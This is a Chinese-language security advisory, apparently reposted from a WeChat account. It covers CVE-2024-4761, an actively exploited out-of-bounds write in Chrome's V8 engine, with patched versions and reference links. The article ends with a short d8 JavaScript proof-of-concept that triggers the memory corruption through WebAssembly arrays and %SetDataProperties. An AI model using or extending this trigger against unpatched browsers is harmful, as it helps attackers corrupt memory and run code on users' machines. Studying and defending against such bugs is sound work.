5月13日谷歌已迅速采取行动,解决其 Chrome 浏览器中的一个高严重性零日漏洞,该漏洞已被广泛利用。该漏洞被识别为CVE-2024-4761 ,是Chrome 的 JavaScript 引擎V8中发现的“越界写入”缺陷。这一严重的安全问题是由一位匿名研究人员发现并报告的,凸显了现代浏览器面临的持续威胁。
漏洞详情
CVE-2024-4761漏洞被归类为“越界写入”问题,当程序在预分配内存边界之外写入数据时就会发生这种情况。此类漏洞可能会导致多种严重后果,包括任意代码执行、数据损坏和系统崩溃。在网络浏览器环境中,它会带来重大风险,因为它可能允许攻击者远程执行恶意代码,从而可能危及用户的系统。
野外积极利用
谷歌在其公告中承认该漏洞正在被积极利用,但为了保护用户而隐瞒了有关攻击的具体细节。该通报称:“谷歌意识到 CVE-2024-4761 的漏洞存在。”由于缺乏有关该漏洞的详细信息,强调了用户更新浏览器以减轻潜在风险的紧迫性。
安全更新推出
为了解决这一关键问题,Google 发布了 Chrome 的安全更新。Mac 和 Windows 的更新版本为 124.0.6367.207/.208,Linux 的更新版本为 124.0.6367.207。这些更新将在未来几天和几周内推出,以确保所有用户都能获得必要的保护。
还建议使用基于 Chromium 的浏览器(例如 Microsoft Edge、Brave、Opera 和 Vivaldi)的用户立即应用这些修复程序。这些浏览器与 Chrome 共享相同的底层代码,因此容易受到相同漏洞的影响。
# 信息
[不适用][339458194] 高 CVE-2024-4761:V8 中写入越界。匿名者于2024年5月9日报道
-
https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_13.htm
-
https://chromium-review.googlesource.com/c/v8/v8/+/5527397
#PoC
```const prefix = "...";d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);let builder = new WasmModuleBuilder();let array = builder.addArray(kWasmI32, true);builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef])).addBody([kExprLocalGet, 0,kGCPrefix, kExprArrayNewDefault, array,kGCPrefix, kExprExternConvertAny,]).exportFunc();let instance = builder.instantiate({});let wasm = instance.exports;let array42 = wasm.createArray(42);// %DebugPrint(array42);let src = {};src.a = 1;delete src.a;for (let i = 0; i < 1024; i++) {src[`p${i}`] = 1;}// %DebugPrint(src);%SetDataProperties(array42, src);```
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):CVE-2024-4761 Google Chrome v8 越界写入 – POC
